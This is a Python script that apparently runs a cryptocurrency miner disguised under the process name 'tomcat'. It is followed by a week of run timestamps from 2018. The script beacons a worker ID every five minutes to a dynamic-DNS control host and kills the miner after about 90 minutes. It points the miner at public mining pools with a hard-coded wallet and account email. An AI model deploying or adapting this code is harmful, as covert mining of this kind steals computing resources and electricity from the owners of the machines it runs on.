import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:46:05.642449
#2018-02-17 17:37:06.125969
#2018-02-17 19:26:04.224779
#2018-02-17 21:17:06.680607
#2018-02-17 23:01:05.380971
#2018-02-18 00:48:06.291341
#2018-02-18 02:37:01.712081
#2018-02-18 04:24:01.395107
#2018-02-18 06:16:07.369858
#2018-02-18 08:06:01.832434
#2018-02-18 09:53:01.967066
#2018-02-18 11:40:01.390806
#2018-02-18 13:25:06.044389
#2018-02-18 15:15:08.108195
#2018-02-18 17:04:07.610523
#2018-02-18 18:51:07.044789
#2018-02-18 20:38:07.787448
#2018-02-18 22:24:01.740836
#2018-02-19 00:13:03.166784
#2018-02-19 01:59:01.764668
#2018-02-19 03:46:07.387315
#2018-02-19 05:30:10.152912
#2018-02-19 07:17:05.700873
#2018-02-19 09:06:06.033460
#2018-02-19 10:54:07.013108
#2018-02-19 12:43:05.642278
#2018-02-19 14:29:06.601925
#2018-02-19 16:17:06.679557
#2018-02-19 18:04:07.079765
#2018-02-19 19:50:07.813262
#2018-02-19 21:37:05.931942
#2018-02-19 23:24:06.188874
#2018-02-20 01:10:04.237436
#2018-02-20 02:59:03.976818
#2018-02-20 04:46:07.552854
#2018-02-20 06:30:08.448653
#2018-02-20 08:15:09.556580
#2018-02-20 10:01:01.453974
#2018-02-20 11:45:02.019876
#2018-02-20 13:32:04.152763
#2018-02-20 15:16:04.519277
#2018-02-20 17:03:08.171623
#2018-02-20 18:52:01.942606
#2018-02-20 20:44:05.876530
#2018-02-20 22:30:01.739057
#2018-02-21 00:11:06.544457
#2018-02-21 01:56:06.943140
#2018-02-21 03:46:05.777633
#2018-02-21 05:36:02.228147
#2018-02-21 07:24:21.692041
#2018-02-21 09:09:02.135813
#2018-02-21 10:57:02.131227
#2018-02-21 12:44:07.627559
#2018-02-21 14:34:09.397648
#2018-02-21 16:20:11.796327
#2018-02-21 18:09:08.467922
#2018-02-21 19:56:06.156349
#2018-02-21 21:44:08.243641
#2018-02-21 23:33:07.756028
#2018-02-22 01:21:01.502110
#2018-02-22 03:09:05.188963
#2018-02-22 04:54:03.902864
#2018-02-22 06:39:07.819334
#2018-02-22 08:28:06.038824
#2018-02-22 10:15:04.095854
#2018-02-22 12:20:07.651584
#2018-02-22 14:06:09.896246
#2018-02-22 15:53:06.535973
#2018-02-22 17:40:10.839626
#2018-02-22 19:27:06.909601
#2018-02-22 21:18:06.852986
#2018-02-22 23:03:08.288871
#2018-02-23 00:49:01.994405
#2018-02-23 02:37:05.707431
#2018-02-23 04:25:06.038920
#2018-02-23 06:12:03.471391
#2018-02-23 07:58:05.103144
#2018-02-23 10:13:08.771286
#2018-02-23 12:07:05.626330
#2018-02-23 13:54:08.198212
#2018-02-23 15:45:11.255735
#2018-02-23 17:31:05.148236
#2018-02-23 19:19:06.677149
#2018-02-23 21:02:02.195715
#2018-02-23 22:46:06.417238
#2018-02-24 00:36:01.636684
#2018-02-24 02:26:01.628794
#2018-02-24 04:17:04.843388
#2018-02-24 06:05:07.213364
#2018-02-24 07:52:01.569134
#2018-02-24 09:37:05.478859
#2018-02-24 11:32:07.651746
#2018-02-24 13:22:03.237131
#2018-02-24 15:11:06.510064
#2018-02-24 16:59:05.244385
#2018-02-24 18:48:01.455551
#2018-02-24 20:38:06.673169
#2018-02-24 22:44:07.438047
#2018-02-25 03:04:07.097364
#2018-02-25 07:05:01.311729